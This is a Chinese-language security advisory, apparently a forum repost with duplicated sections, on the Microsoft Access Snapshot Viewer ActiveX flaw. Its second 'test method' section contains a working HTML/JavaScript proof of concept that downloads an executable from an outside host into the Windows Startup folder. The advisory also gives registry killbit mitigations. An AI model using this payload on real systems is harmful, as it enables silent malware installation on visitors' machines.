影响系统:
详细:
受到影响的产品主要是Microsoft Access2003以及之前的版本,或者安装了Microsoft Snapshot Viewer 的系统都可能遭受攻击.
Microsoft Access中捆绑了快照工具Microsoft Snapshot Viewer,由于该工具的控件没有正确验证SnapshotPath,
CompressedPath的参数,导致用户在访问到黑客构造的攻击网页后,可能将恶意文件下载到任意位置,并且随着系统启动而执行.
测试方法:
推荐的应对方法:
目前厂商尚未发布补丁程序.建议使用此软件的用户关注以下地址进行更新:
[url=http://www.microsoft.com/technet/security/]http://www.microsoft.com/t...[/url]
将以下CLSID设置KILLBIT:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Internet Explorer/ActiveX Compatibility/{F0E42D50-368C-11D0-AD81-00A0C90DC8D9}]
“Compatibility Flags”=dword:00000400
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Internet Explorer/ActiveX Compatibility/{F0E42D60-368C-11D0-AD81-00A0C90DC8D9}]
“Compatibility Flags”=dword:00000400
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Internet Explorer/ActiveX Compatibility/{F2175210-368C-11D0-AD81-00A0C90DC8D9}]
“Compatibility Flags”=dword:00000400
Microsoft Access 2003
Microsoft Access 2002
Microsoft Access 2000
Microsoft Snapshot Viewer 10.0.4622
详细:
受到影响的产品主要是Microsoft Access2003以及之前的版本,或者安装了Microsoft Snapshot Viewer 的系统都可能遭受攻击.
Microsoft Access中捆绑了快照工具Microsoft Snapshot Viewer,由于该工具的控件没有正确验证SnapshotPath,
CompressedPath的参数,导致用户在访问到黑客构造的攻击网页后,可能将恶意文件下载到任意位置,并且随着系统启动而执行.
测试方法:
- <html>
- <object classid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9' id='obj'></object>
- <script language='javascript'>
- var buf1 = 'http://xgymcn.5d6d.com/test.exe';
- var buf2 = 'C:/Documents and Settings/All Users/「开始」菜单/程序/启动/test.exe';
- obj.SnapshotPath = buf1;
- obj.CompressedPath = buf2;
- obj.PrintSnapshot();
- </script>
- </html>
推荐的应对方法:
目前厂商尚未发布补丁程序.建议使用此软件的用户关注以下地址进行更新:
[url=http://www.microsoft.com/technet/security/]http://www.microsoft.com/t...[/url]
将以下CLSID设置KILLBIT:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Internet Explorer/ActiveX Compatibility/{F0E42D50-368C-11D0-AD81-00A0C90DC8D9}]
“Compatibility Flags”=dword:00000400
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Internet Explorer/ActiveX Compatibility/{F0E42D60-368C-11D0-AD81-00A0C90DC8D9}]
“Compatibility Flags”=dword:00000400
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Internet Explorer/ActiveX Compatibility/{F2175210-368C-11D0-AD81-00A0C90DC8D9}]
“Compatibility Flags”=dword:00000400